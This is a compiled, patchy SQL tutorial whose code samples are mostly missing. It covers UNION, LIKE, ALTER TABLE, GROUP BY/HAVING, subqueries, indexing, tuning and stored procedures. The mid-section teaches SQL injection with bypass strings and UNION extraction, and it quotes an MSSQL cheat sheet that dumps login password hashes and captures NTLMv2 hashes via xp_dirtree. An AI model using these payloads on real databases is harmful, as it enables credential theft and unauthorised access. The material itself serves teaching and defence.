row from the departments table. Therefore, unless you are sure that you want a Cartesian product don't
use a cross join.
Part 4: Union
UNION ALL
After executing the above command, you'll get the output something like this:
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
+--------+--------------+------------+------------------+
As you can see the result includes all the rows from both the departments and employees table.
In a join query, the left table is the one that appears leftmost in the JOIN clause, and the right table is the
one that appears rightmost.
When performing outer joins, wherever the DBMS (Database Management System) can't match any row,
it places NULL in the columns to indicate data do not exist.
The UNION operator is used to combine the results of two or more SELECT queries into a single result
set. The union operation is different from using joins that combine columns from two tables. The union
operation creates a new table by placing all rows from two source tables into a single result table, placing
the rows on top of one another.
These are basic rules for combining the result sets of two SELECT queries by using UNION:
The number and the order of the columns must be the same in all queries.
Syntax
To understand the union operation in a better way, let's assume that some hypothetical fields, like
first_name and last_name exists in our employees and customers tables. Please note that these fields do
not actually exist in our demo database tables.
+----+------------+-----------+--------+
+----+------------+-----------+--------+
| 1 | Ethan | Hunt | 5000 |
+----+------------+-----------+--------+
Table: employees
+----+------------+-----------+----------+
+----+------------+-----------+----------+
+----+------------+-----------+----------+
Table: customers
The following statement returns the first and last names of all the customers and employees:
UNION
+---------------+--------------+
| first_name | last_name |
+---------------+--------------+
| Ethan | Hunt |
| Tony | Montana |
| Sarah | Connor |
| Rick | Deckard |
| Martin | Blank |
| Maria | Anders |
| Fran | Wilson |
| Dominique | Perrier |
| Thomas | Hardy |
+---------------+--------------+
The UNION operation eliminates the duplicate rows from the combined result set, by default. That's why
the above query returns only 9 rows, because if you notice the name "Martin Blank" appears in both the
employees and customers tables.
However, if you want to keep the duplicate rows you can use the ALL keyword, as follow:
UNION ALL
Pattern Matching
So far, you've seen the conditions that identify an exact string, e.g. WHERE name='Lois Lane'. But in
SQL you can perform partial or pattern matching too using the LIKE operator.
The LIKE operator provides a measure of pattern matching by allowing you to specify wildcards for one or
more characters. You can use the following two wildcard characters:
The percent sign (%) — Matches any number of characters, even zero characters.
Here're some examples that show how to use the LIKE operator with wildcards.
Consider we've an employees table in our database with the following records:
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
Now, let's say you want to find out all the employees whose name begins with S letter.
After executing the query, you'll get the output something like this:
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
In MySQL nonbinary string (CHAR, VARCHAR, TEXT) comparisons are case-insensitive by default,
whereas binary strings (BINARY, VARBINARY, BLOB) comparisons are case-sensitive.
This means that if you search with WHERE name LIKE 'S%', you get all column values that start with S or
s (as you can see we've got both "Sarah" and "simons"). However, if you want to make this search case
sensitive you can use the BINARY operator as follow:
Now, this statement will return only those employees whose name starts with capital S letter:
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
+--------+------------------+------------+--------+---------+
If you want a column always to be treated in case-sensitive fashion, declare it with a case sensitive or
binary collation to avoid any performance issue.
Partial matches are useful when you don't know the exact form of the string for which you're searching.
You can also use partial matching to retrieve multiple rows that contain similar strings in one of the table's
columns.
Part 6: SQL ALTER TABLE Statement
It is quite possible that after creating a table, as you start using it, you may discover you've forgot to
mention any column or constraint or specified a wrong name for the column.
In such situation you can use the ALTER TABLE statement to alter or change an existing table by adding,
changing, or deleting a column in the table.
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
We'll use this shippers table for all of our ALTER TABLE statements.
Now suppose that we want to expand the existing shippers table by adding one more column. But, the
question is how we can do this using SQL commands? Well let's find out.
Adding a New Column
The basic syntax for adding a new column to an existing table can be given with:
Now, after executing the above statement if you see the table structure using the command
DESCRIBE shippers; on MySQL command-line, it looks as follow:
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
If you want to add a NOT NULL column to an existing table then you must specify an explicit default
value. This default value is used to populate the new column for every row that already exists in your
table.
When adding a new column to the table, if neither NULL nor NOT NULL is specified, the column is treated
as though NULL had been specified.
if you've already created a table but unhappy with the existing column position within the table, you can
change it any time using the following syntax:
Our current shippers table has one major problem. If you insert records with duplicate phone numbers it
wouldn't stop you from doing that, which is not good, it should be unique.
You can fix this by adding a constraint UNIQUE to the phone column. The basic syntax for adding this
constraint to existing table columns can be given with:
Similarly, if you've created a table without a PRIMARY KEY, you can add one with:
Removing Columns
The basic syntax for removing a column from an existing table can be given with:
Now, after executing the above statement if you see the table structure, it looks as follow:
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
+--------------+-------------+------+-----+---------+----------------+
You can modify the data type of a column in SQL Server by using the ALTER clause, as follow:
Renaming Tables
The basic syntax for renaming an existing table in MySQL can be given with:
When multiple tables are being joined in a single query, you need to prefix each column name with the
name of the table it belongs to, like employees.dept_id, departments.dept_id, etc. in order to avoid the
confusion and ambiguous column error in case columns in different tables have the same name. But, if
table names are long and appears several times in the query then writing the query would become a
difficult and annoying task.
So to save time and avoid writing the complete table names, you can give each table a short alias name
and refer to its columns using that alias name in the query.
To understand this clearly, let's look at the following employees and departments tables.
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
Table: employees
+---------+------------------+
| dept_id | dept_name |
+---------+------------------+
| 1 | Administration |
| 2 | Customer Service |
| 3 | Finance |
| 4 | Human Resources |
| 5 | Sales |
+---------+------------------+
Table: departments
Here's a query that retrieves the employee's id, name and their department name by joining the
employees and departments tables together using the common dept_id field.
Here's the compact version of the previous query that uses table aliases:
If you execute any of these statements, you'll get the same output, as follow:
+--------+-----------------+--------------------+
+--------+-----------------+--------------------+
+--------+-----------------+--------------------+
As you can see how much typing effort we can save by using the table aliases.
Defining Aliases for Table Columns
Consider the following query in which we've used an expression to reformat the dates in the hire_date
column for generating a custom output:
If you execute the above statement, you'll get the output something like this:
+--------------+-------------------------------------+
+--------------+-------------------------------------+
+--------------+-------------------------------------+
As you see the label of the last column in our output is long and unwieldy. We can fix this problem using
the column aliases, as follow:
FROM employees;
+--------------+------------------+
| emp_name | hire_date |
+--------------+------------------+
+--------------+------------------+
You can use the alias in GROUP BY, ORDER BY, or HAVING clauses to refer to the column. However,
aliases in a WHERE clause is not allowed.
Grouping Rows
The GROUP BY clause is used in conjunction with the SELECT statement and aggregate functions to
group rows together by common column values
To understand this easily, let's look at the following employees and departments tables.
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
Table: employees
+---------+------------------+
| dept_id | dept_name |
+---------+------------------+
| 1 | Administration |
| 2 | Customer Service |
| 3 | Finance |
| 4 | Human Resources |
| 5 | Sales |
+---------+------------------+
Table: departments
Now, let's say instead of finding just name of the employees and their departments, you want to find out
the total number of employees in every department.
In case of small tables you can simply apply the left join and count the number of employees, but suppose
if a table contains thousands of employees then it wouldn't be so easy.
In this situation you can use the GROUP BY clause with the SELECT statement, like this:
ON t1.dept_id = t2.dept_id
GROUP BY t1.dept_name;
If you execute the above statement, you'll get the output something like this:
+-------------------+-----------------+
| dept_name | total_employees |
+-------------------+-----------------+
| Administration | 1|
| Customer Service | 0|
| Finance | 1|
| Human Resources | 1|
| Sales | 1|
+-------------------+-----------------+
In the next chapter you'll learn how to specify a search condition for a group or an aggregate using the
HAVING clause with the GROUP BY clause.
The GROUP BY clause must appear after the FROM and WHERE clauses, and before the ORDER BY in
a SQL SELECT statement.
Part 9: SQL HAVING Clause
The HAVING clause is typically used with the GROUP BY clause to specify a filter condition for a group or
an aggregate. The HAVING clause can only be used with the SELECT statement.
To understand this easily, let's look at the following employees and departments tables.
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
+--------+--------------+------------+---------+
Table: employees
+---------+------------------+
| dept_id | dept_name |
+---------+------------------+
| 1 | Administration |
| 2 | Customer Service |
| 3 | Finance |
| 4 | Human Resources |
| 5 | Sales |
+---------+------------------+
Table: departments
Now, let's say instead of finding just name of the employees and their departments, you want to find out
the names of those departments in which there are no employees.
In case of small tables you can simply apply the left join and check each department manually, but
suppose if a table contains thousands of employees then it wouldn't be so easy.
In this situation you can use the HAVING clause with the GROUP BY clause, like this:
ON t1.dept_id = t2.dept_id
GROUP BY t1.dept_name
HAVING total_employees = 0;
If you execute the above statement, you'll get the output something like this:
+------------------+-----------------+
| dept_name | total_employees |
+------------------+-----------------+
| Customer Service | 0|
+------------------+-----------------+
A HAVING clause is similar to a WHERE clause, but applies only to groups as a whole, whereas the
WHERE clause applies to individual rows.
A SELECT query can contain both a WHERE and a HAVING clause, but in that case the WHERE clause
must appear before the GROUP BY clause, whereas the HAVING clause must appear after it but before
the ORDER BY clause.
Part 10: Further Reading
SQL Subqueries
What Is a Subquery?
A subquery, also known as a nested query or subselect, is a SELECT query embedded within the
WHERE or HAVING clause of another SQL query. The data returned by the subquery is used by the
outer statement in the same way a literal value would be used.
Subqueries provide an easy and efficient way to handle the queries that depend on the results from
another query. They are almost identical to the normal SELECT statements, but there are few restrictions.
The most important ones are listed below:
A subquery must return only one column. This means you cannot use SELECT * in a subquery unless the
table you are referring has only one column. You may use a subquery that returns multiple columns, if the
purpose is row comparison.
You can only use subqueries that return more than one row with multiple value operators, such as the IN
or NOT IN operator.
Subqueries are most frequently used with the SELECT statement, however you can use them within a
INSERT, UPDATE, or DELETE statement as well, or inside another subquery.
The following statement will return the details of only those customers whose order value in the orders
table is more than 5000 dollar. Also note that we've used the keyword DISTINCT in our subquery to
eliminate the duplicate cust_id values from the result set.
A subquery can return a single value, a single row, a single column, or a table containing one or more
rows of one or more columns.
Note: A subquery can be nested inside the WHERE or HAVING clause of an outer SELECT, INSERT,
UPDATE, or DELETE statement, or inside another subquery.
Subqueries with the INSERT Statement
The above statement will insert the records of premium customers into a table called
premium_customers, by using the data returned from subquery. Here the premium customers are the
customers who had placed order worth more than 5000 dollar.
You can also use the subqueries in conjunction with the UPDATE statement to update the single or
multiple columns in a table, as follow:
UPDATE orders
The above statement will update the order value in the orders table for those customers who live in the
area whose postal code is 75016, by increasing the current order value by 10 dollar.
Similarly, you can use the subqueries in conjunction with the DELETE statement to delete the single or
multiple rows in a table, as follow:
Consider the following SQL statement which is a simple example of authenticating a user with a
username and password in a web application.
Here, username_val and password_val represents the username and password entered by the user
respectively. If a user enters the values such as "john" as username and "123" as password, then the
resulting statement will be:
But suppose, if user is an attacker and instead of entering a valid username and password in the input
fields, he entered the values something like: ' OR 'x'='x
This statement is a valid SQL statement and since WHERE 'x'='x' is always true, the query will return all
rows from the users table. You can see how easily an attacker can get access to all the sensitive
information of a database with just a little dirty trick.
If the users table is quite large and contains millions or rows, this single statement can also lead to denial-
of-service attack (DoS attack) by overloading the system resources and make your application
unavailable for legitimate users.
Warning: The consequences of ignoring SQL injection vulnerability can be even worse if your script
generates a DELETE or UPDATE query. An attacker can delete data from the table or change all of its
rows permanently.
Always validate user input and make no assumptions. Never build SQL statements directly from user
input. If you're using PHP and MySQL you can use mysqli_real_escape_string() function to create a legal
SQL string that you can use in an SQL statement.
Here's a very basic example of user authentication using PHP and MySQL that demonstrates how to
prevent SQL injection while taking input from users.
Check This out: https://www.sqlshack.com/learn-sql-sql-injection/
SQL Injection is a well-known technique used to attack SQL-based applications. In this article,
we’ll focus on examples showing how you could exploit database vulnerabilities using this
technique, while in the next article we’ll talk about ways how you can protect your application
from such attacks.
Data Model
The main idea behind such attacks is to detect parts of the application where you can perform
such attacks (usually text boxes on forms) and populate them with values that would perform
what you want. These inserted values, when combined with the query in the background, shall
result in a query that will do what you want and not what the application owner planned.
We’ll take a look at a few examples, which are all similar but still different in the way how
you’ll exploit application vulnerabilities.
In all our examples we’ll use dynamic SQL to simulate passing parameters to the query
(applications similarly handle this). The @sql variable contains the query without parameter and
the @id variable contains a parameter value.
In the first query, I just wanted to show how dynamic SQL is declared and executed so the first
query just returns all rows from the customer table. In this query parameters were not used.
The second query uses the parameter @id and the intention is that we pass only the id of the row
we want to return. Notice that this parameter is declared as textual value – NVARCHAR(MAX).
This is because parameters shall often be passed as textual values. As expected, the second result
set returns only the row with the given id. So far, so good.
The third query is interesting to us. As a parameter we’ve passed ‘2 OR 1 = 1’. So, we have the
value related to the desired row, but we’ve added OR 1 = 1. This condition always holds and
therefore for each row in this table the whole condition shall be true and we’ll return all rows
from the table.
All of the data in the database are valuable to you, but for the potential hacker, the data that shall
be the most interesting are your business data, data related to your customers, and application
users – either they are company employees either customers.
If we’re talking about passwords, one of the best ways to protect them is to store them coded as
hash values. That way, even if someone gets access to these values, he won’t know the original
password.
SQL Injection using UNION
Another common example of this technique is using UNION to join two datasets. In that case,
the first dataset is probably not so interesting to us as much as the second one (pretty obvious
because we’ve used UNION to add that set). Let’s see how this can be done.
The first query returns exactly what should have been returned, and the second query is the one
where malicious code had been used. Besides the parameter value, we’ve added the whole query
– ‘2 UNION SELECT id, first_name + ” ” + last_name FROM employee’. This result set
contains one row from the customer table and all rows from the employee table.
We could simply be “mean” and try to confuse the database users. Other than that, we could
insert malicious values (e.g. create an admin account for ourselves) or add objects to the database
where we’ll store the results of actions generated by the code we’ve altered.
The first query returns exactly the desired customer. The second query, besides returning the
selected customer, also inserts a new record to the employee table. With the last query, I’ve
checked that the row had been inserted.
It seems that SQL injection is limited only by your imagination. And, of course, the security
implemented in the application.
Conclusion
In this article, we learned what SQL injection is and how it works. In the next article, we’ll talk
about a way how to prevent such attacks in your application. There are a few ways to do that, but
we’ll combine what we’ve learned so far in this series, including stored procedures and
functions, and see how to use that knowledge to prevent these attacks.
Visit Injection Cheat sheet here :
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection
MS SQL
MSSQL comments
MSSQL User
SELECT CURRENT_USER
MSSQL version
SELECT @@version
SELECT DB_NAME()
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name =
‘mytable’); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name=’sometable’; — list colum names and types for
master..sometable
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for
views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM
master..syscolumns, master..sysobjects WHERE
master..syscolumns.id=master..sysobjects.id AND
master..sysobjects.name=’sometable’; — list colum names and types for
master..sometable
MSSQL 2000:
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
(Need to convert to hex to return hashes in MSSQL error message / some version
of query analyzer.)
MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from
master.sys.sql_logins
Executed by a different user than the one using xp_cmdshell to execute commands
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use
the xp_dirtree function to list the files in our SMB share and grab the NTLMv2 hash.
Manual exploitation
-- find link
select * from master..sysservers
Database management systems like SQL Server have to translate the SQL queries you give them into
the actual instructions they have to perform to read or change the data in the database. After processing,
the database engine then also attempts to automatically optimize the query where possible.
Query optimization is when a developer, or the database engine, changes a query in such a way that SQL
Server is able to return the same results more efficiently. Sometimes it's a simple as using EXISTS()
instead of COUNT(), but other times the query needs to be rewritten with a different approach.
Performance tuning includes query optimization, SQL client code optimization, database index
management, and in another sense, better coordination between developers and DBAs.
An index tracks a targeted subset of a table's data so that selecting and ordering can be done much
faster, without the server having to look through every last bit of data for that table.
EXISTS() stops processing as soon as it finds a matching row, whereas COUNT() has to count every row,
regardless of whether you actually need that detail in the end.
Imagine a scenario in which 1000 queries hammer your database in sequence. Something like:
cmd.ExecuteNonQuery();
}
You should avoid such loops in your code. For example, we could transform the above snippet by using a
unique INSERT or UPDATE statement with multiple rows and values:
INSERT INTO TableName (A,B,C) SELECT 1,2,3 UNION ALL SELECT 4,5,6 -- SQL SERVER 2005
END
WHERE B in (1,2,3)
Make sure that your WHERE clause avoids updating the stored value if it matches the existing value.
Such a trivial optimization can dramatically increase SQL query performance by updating only hundreds
of rows instead of thousands. For example:
UPDATE TableName
SET A = @VALUE
WHERE
B = 'YOUR CONDITION'
A correlated subquery is one which uses values from the parent query. This kind of SQL query tends to
run row-by-row, once for each row returned by the outer query, and thus decreases SQL query
performance. New SQL developers are often caught structuring their queries in this way—because it’s
usually the easy route.
SELECT c.Name,
c.City,
FROM Customer c
In particular, the problem is that the inner query (SELECT CompanyName…) is run for each row returned
by the outer query (SELECT c.Name…). But why go over the Company again and again for every row
processed by the outer query?
A more efficient SQL performance tuning technique would be to refactor the correlated subquery as a
join:
SELECT c.Name,
c.City,
co.CompanyName
FROM Customer c
ON c.CompanyID = co.CompanyID
In this case, we go over the Company table just once, at the start, and JOIN it with the Customer table.
From then on, we can select the values we need (co.CompanyName) more efficiently.
One of my favorite SQL optimization tips is to avoid SELECT *! Instead, you should individually include
the specific columns that you need. Again, this sounds simple, but I see this error all over the place.
Consider a table with hundreds of columns and millions of rows—if your application only really needs a
few columns, there’s no sense in querying for all the data. It’s a massive waste of resources. For
example:
vs.
If you really need every column, explicitly list every column. This isn’t so much a rule, but rather, a means
of preventing future system errors and additional SQL performance tuning. For example, if you’re using
an INSERT... SELECT... and the source table has changed via the addition of a new column, you might
run into issues, even if that column isn’t needed by the destination table, e.g.:
Insert Error: Column name or number of supplied values does not match table definition.
To avoid this kind of error from SQL Server, you should declare each column individually:
FROM OldEmployees
Note, however, that there are some situations where the use of SELECT * could be appropriate. For
example, with temp tables—which leads us to our next topic.
Temporary tables usually increase a query’s complexity. If your code can be written in a simple,
straightforward manner, I’d suggest avoiding temp tables.
But if you have a stored procedure with some data manipulation that cannot be handled with a single
query, you can use temp tables as intermediaries to help you to generate a final result.
When you have to join a large table and there are conditions on said table, you can increase database
performance by transferring your data in a temp table, and then making a join on that. Your temp table will
have fewer rows than the original (large) table, so the join will finish faster!
The decision isn’t always straightforward, but this example will give you a sense for situations in which
you might want to use temp tables:
Imagine a customer table with millions of records. You have to make a join on a specific region. You can
achieve this by using a SELECT INTO statement and then joining with the temp table:
(Note: some SQL developers also avoid using SELECT INTO to create temp tables, saying that this
command locks the tempdb database, disallowing other users from creating temp tables. Fortunately, this
is fixed in 7.0 and later.)
ON t.RegionID = r.RegionID
But wait! There’s a problem with this second query. As described above, we should only be including the
columns we need in our subquery (i.e., not using SELECT *). Taking that into account:
ON t.RegionID = r.RegionID
All of these SQL snippets will return the same data. But with temp tables, we could, for example, create
an index in the temp table to improve performance. There’s some good discussion here on the
differences between temporary tables and subqueries.
Finally, when you’re done with your temp table, delete it to clear tempdb resources, rather than just wait
for it to be automatically deleted (as it will be when your connection to the database is terminated):
DROP TABLE #temp
This SQL optimization technique concerns the use of EXISTS(). If you want to check if a record exists,
use EXISTS() instead of COUNT(). While COUNT() scans the entire table, counting up all entries
matching your condition, EXISTS() will exit as soon as it sees the result it needs. This will give you better
performance and clearer code.
PRINT 'YES'
vs.
PRINT 'YES'
As DBAs working with SQL Server 2016 are likely aware, the version marked an important shift in
defaults and compatibility management. As a major version, it, of course, comes with new query
optimizations, but control over whether they’re used is now streamlined via
sys.databases.compatibility_level.
SQL database administrators (DBAs) and developers often clash over data- and non-data-related issues.
Drawn from my experience, here are some tips (for both parties) on how to get along and work together
effectively.
Database Optimization for Developers:
If your application stops working suddenly, it may not be a database issue. For example, maybe you have
a network problem. Investigate a bit before you accuse a DBA!
Even if you’re a ninja SQL data modeler, ask a DBA to help you with your relational diagram. They have a
lot to share and offer.
DBAs don’t like rapid changes. This is natural: they need to analyze the database as a whole and
examine the impact of any changes from all angles. A simple change in a column can take a week to be
implemented—but that’s because an error could materialize as huge losses for the company. Be patient!
Do not ask SQL DBAs to make data changes in a production environment. If you want access to the
production database, you have to be responsible for all your own changes.
If you don’t like people asking you about the database, give them a real-time status panel. Developers are
always suspicious of a database’s status, and such a panel could save everyone time and energy.
Help developers in a test/quality assurance environment. Make it easy to simulate a production server
with simple tests on real-world data. This will be a significant time-saver for others as well as yourself.
Developers spend all day on systems with frequently-changed business logic. Try to understand this
world being more flexible, and be able to break some rules in a critical moment.
SQL databases evolve. The day will come when you have to migrate your data to a new version.
Developers count on significant new functionality with each new version. Instead of refusing to accept
their changes, plan ahead and be ready for the migration.
What is Index?
An index is a data structure associated with a table that provides fast access to rows in a table based on
the values in one or more columns (the index key).
Let's say, you have a customers table in your database and you want to find out all the customers whose
names begin with the letter A, using the following statement.
To find such customers, server must scan each row one by one in the customers table and inspect the
contents of the name column. While it works fine for a table having few rows, but imagine how long it
might take to answer the query if the table contains million of rows. In such situation you can speed things
up by applying indexes to the table.
A database index is an important auxiliary data structure helping to speed up data retrieval. The amount
of data accessed to execute an SQL query is the main factor contributing to the execution time. The use
of well-designed indexes minimizes the volume of accessed data.
The main use case is a query returning data based on a condition of the type "column value between X
and Y." An index on the column allows the RDBMS to quickly find the first row satisfying the condition,
read consecutive rows from the given range, and stop without needing to read any other data.
Indexes can be categorized in types in several ways: its structure (B-tree, hash table, binary, column-
store, full-text, etc.), whether it's clustered or not, and whether it's partitioned (locally, globally, or not at
all). Some store entire rows, some store derivative values, others store straight column copies.
A typical index is implemented using a balanced tree structure. Leaf levels of an index are sorted based
on column values. So, when we want to find all rows with a specific value of an indexed column, we are
able to quickly locate the first one and read consecutive rows as long as they match the value.
An appropriate index can significantly reduce the amount of data accessed by a SELECT statement,
which is the main factor contributing to query execution time.
Modern databases often keep and publish massive volumes of data. When a user tries to retrieve just a
small piece of data without an appropriate index, the retrieval (of a needle in a haystack) could take
hours.
Creating an Index
For example, to create an index on the name column in the customers table, you could use:
By default, the index will allow duplicate entries and sort the entries in ascending order. To require unique
index entries, add the keyword UNIQUE after CREATE, like this:
ON customers (cust_name);
You can also build the indexes that span multiple columns. For example, suppose you've a table in your
database named users having the columns first_name and last_name, and you frequently access the
user's records using these columns then you can build an index on both the columns together to improve
the performance, as follow:
Tip: You can consider a database index as index section of a book that helps you quickly find or locate a
specific topic within the book.
Index should be created with care. Because, every time a row is added, updated or removed from a table,
all indexes on that table must be modified. Therefore, the more indexes you have, the more work the
server needs to do, which finally leads to slower performance.
Here are some basic guidelines that you can follow while creating index:
Don't create indexes for columns that you never use as retrieval keys.
Index columns that are used for joins to improve join performance.
Also, small tables do not require indexes, because in the case of small tables, it is usually faster for the
server to scan the table rather than look at the index first.
Drop Indexes
You can drop indexes that are no longer required with the following statement.
Properly used, an SQL database index can be so effective that it might seem like magic. But the following
series of exercises will show that underneath, the logic of most SQL indexes—and wielding them correctly
—is quite straightforward.
In this series, SQL Indexes Explained, we will walk through the motivations for using indexes to access
data and for designing indexes in the way it is done by all modern RDBMSes. We will then look at the
algorithms used to return data for specific query patterns.
This isn’t just an SQL index tutorial—it’s a deep dive into understanding the underlying mechanics of
indexes.
We are going to figure out how an RDBMS uses indexes by doing exercises and analyzing our problem-
solving methods. Our exercise material consists of read-only Google Sheets. To do an exercise, you can
copy the Google Sheet (File → Make a copy) or copy its contents into your own Google Sheet.
In every exercise, we’ll show an SQL query that uses Oracle syntax. For dates, we will use the ISO 8601
format, YYYY-MM-DD.
The first task—don’t do it just yet—is to find all rows from the Reservation spreadsheet for a specific client
of a hotel reservation system, and copy them into your own spreadsheet, simulating the execution of the
following query:
SELECT
*
FROM
Reservations
WHERE
ClientID = 12;
For the first try, do not use any sorting or filtering features. Please, record the time spent. The resulting
sheet should contain 73 rows.
This pseudocode illustrates the algorithm for accomplishing the task without sorting:
In this case, we had to check all 841 rows to return and copy 73 rows satisfying the condition.
For the second try, sort the sheet according to the value of the ClientID column. Do not use filters. Record
the time and compare it with the time it took to complete the task without sorting data.
This time, we had to check “only” 780 rows. If we could somehow jump to the first row, it would take even
less time.
But if we would have to develop a program for the task, this solution would be even slower than the first
one. That’s because we would have to sort all the data first, which means each row would have to be
accessed at least once. This approach is good only if the sheet is already sorted in the desired order.
Now the task is to count the number of check-ins on the 16th of August 2020:
SELECT
COUNT (*)
FROM
Reservations
WHERE
Use the spreadsheet from Exercise 1. Measure and compare the time spent completing the task with and
without sorting. The correct count is 91.
For the approach without sorting, the algorithm is basically the same as the one from Exercise 1.
The sorting approach is also similar to the one from the previous exercise. We will just split the loop into
two parts:
Repeat
The police inspector requests to see a list of guests that arrived at the hotel on the 13th and 14th of
August 2020.
SELECT
ClientID
FROM
Reservations
WHERE
DateFrom BETWEEN (
TO_DATE('2020-08-14', 'YYYY-MM-DD')
)
AND HotelID = 3;
The inspector wants the list fast. We already know that we’d better sort the table/spreadsheet according
to the date of arrival. If we just finished Exercise 2, we are lucky that the table is already sorted. So, we
apply the approach similar to the one from Exercise 2.
Please, try and record the time, the number of rows you had to read, and the number of items on the list.
Repeat
Using this approach, we had to read 511 rows to compile a list of 46 guests. If we were able to precisely
slide down, we did not actually have to perform 324 reads from the repeat cycle just to locate the first
arrival on the 13th of August. However, we still had to read more than 100 rows to check if the guest
arrived in the hotel with a HotelID of 3.
The inspector waited all that time but would not be happy: Instead of guests’ names and other relevant
data, we only delivered a list of meaningless IDs.
We’ll get back to that aspect later in the series. Let’s first find a way to prepare the list faster.
To sort the rows according to HotelID then DateFrom, we can select all columns, then use the Google
Sheets menu option Data → Sort range.
Repeat
We had to skip the first 338 arrivals before locating the first one to our hotel. After that, we went over 103
earlier arrivals to locate the first on the 13th of August. Finally, we copied 46 consecutive values of
ClientID. It helped us that in the third step, we were able to copy a block of consecutive IDs. Too bad we
couldn’t somehow jump to the first row from that block.
Now try the same exercise using the spreadsheet ordered by HotelID only.
The algorithm applied to the table ordered by HotelID only is less efficient than when we sort by HotelID
and DateFrom (in that order):
Repeat
While HotelID = 3
In this case, we have to read all 166 arrivals to the hotel with a HotelID of 3, and for each, to check if the
DateFrom belongs to the requested interval.
Approach 4: Sorted by Date, Then Hotel
Does it really matter whether we sort first by HotelID and then DateFrom or vice versa? Let’s find out: Try
sorting first by DateFrom, then by HotelID.
Repeat
If HotelID = 3
We located the first row with the relevant date, then read more until we located the first arrival to the hotel.
After that, for a number of rows, both conditions were fulfilled, the correct date and the right hotel.
However, after arrivals in hotel 3, we had arrivals to hotels 4, 5, and so on, for the same date. After them,
we had to again read rows for the next day for hotels 1 and 2, until we were able to read consecutive
arrivals to our hotel of interest.
As we can see, all approaches have a single consecutive block of data in the middle of the complete set
of rows, representing partially matched data. Approaches 2 and 4 are the only ones where logic allows us
to stop the algorithm entirely before we reach the end of the partial matches.
Approach 4 has fully matched data in two blocks, but Approach 2 is the only one where the targeted data
is all in one consecutive block.
If a table is not already sorted, sorting takes more time than reading from an unsorted table.
Finding a way to jump to the first row matching a search condition within the sorted table would save a lot
of reads.
Maintaining the sorted copies of the table for the most frequent queries would be helpful.
Now, a sorted copy of a table sounds almost like a database index. The next article in SQL Indexes
Explained covers a rudimentary index implementation. Thanks for reading!
Kevin Bloch (https://www.toptal.com/sql-server/sql-database-tuning-for-developers)
What Are Stored Procedures
Stored procedures (SPs) in SQL Server are just like procedures/routines in other DBMSs or
programming languages. Each procedure has one or more statements. In our case, these are SQL
statements. So, you can write a procedure that will – insert new data, update or delete existing,
retrieve data using the SELECT statement. And even better, you can combine more (different
statements) in the stored procedures. Also, inside the procedure, you can call another SP,
function, use the IF statement, etc. Therefore, it’s pretty obvious SP can do much more than a
single select query.
The main idea is to write down the procedure performing all the operations we want, and later,
when needed, call this procedure using parameters. Therefore, an SP for the end-user would be
like a black box, receiving input and returning the output.
We’ve used the DROP PROCEDURE IF EXISTS p_customer_all; statement in the first line. This is
nice practice, especially when you’re creating scripts you want to work always, no matter the
state of the database. The command DROP PROCEDURE p_customer_all; would delete the
procedure with the given name. Still, if the procedure wasn’t already created in the database,
this would result in an error. Therefore, adding IF EXISTS prevents this from happening. This row
generally says – I will delete this procedure if it’s on the server, and if it is not present, OK, do
nothing
The word GO is inserted between two SQL statements in situations like this one
The name of our procedure is p_customer_all. The reason for that is as follows – “p” is for the
procedure, followed by the table name (customer) and the action we’ll use this procedure for
(return all)
The body of the procedure is just a simple select statement returning all rows from this table
After the procedure is created, you can see it in the Object Explorer, under Programmability ->
Stored Procedures.
Let’s now call/execute our SP.
To do this, we’ll use the syntax: EXEC procedure_name <parameters if any>;. So, our statement
is:
For the procedure that will return only one row based on the id, the code is:
The new moment here is that we pass the parameter to the procedure. We can pass one or more
parameters. We’ll list them all after the procedure name in the CREATE PROCEDURE line
(CREATE PROCEDURE p_customer (@id INT)).
Let’s now create a procedure that will insert a new customer in the table.
the new row was added. We’ll check what is in the table by calling the first procedure we’ve
created:
The last procedure, we’ll analyze today is the one to delete a row using the id passed as
parameter. Let’s create the procedure first.
Once again, we’ve followed the same naming convention when giving the name to our
procedure. We pass only 1 parameter and that is the id of the row to delete. Let’s call the
procedure now:
This deleted the row with id 6. Let’s check it again, using our first procedure:
We’ve seen 4 examples of how we could use SPs to perform simple database operations. In
upcoming articles, we’ll go with more complex stored procedures. But before we do that, let’s
comment on the advantages SPs have.
Modular programming – If you decide to put all logic inside SPs, you’ll be able to easily
create/identify modules/parts of your code in charge of different business operations in your
system. This will require using the good naming convention and stick to the internal rules, but
the benefits are really great. When you need to change something, you will be able to find the
related code faster. When you change that code (SP), the change shall be immediately visible at
all places where this SP is called
Better performance – Stored procedures are parsed and optimized after they are created. Since
they are stored, there is no need to parse and optimize them again like that would be the case
when not using them. This shall definitely spare some time when executing queries inside the SP
Reducing network traffic – This might not be so important as others, but is still an advantage.
When you call an SP, you’ll pass its’ name and parameters. Otherwise, you’ll need to send all the
lines of code. In case the SP is pretty complex, this would have a larger impact
Security – This one is very important. Just as with other database objects, you can define who
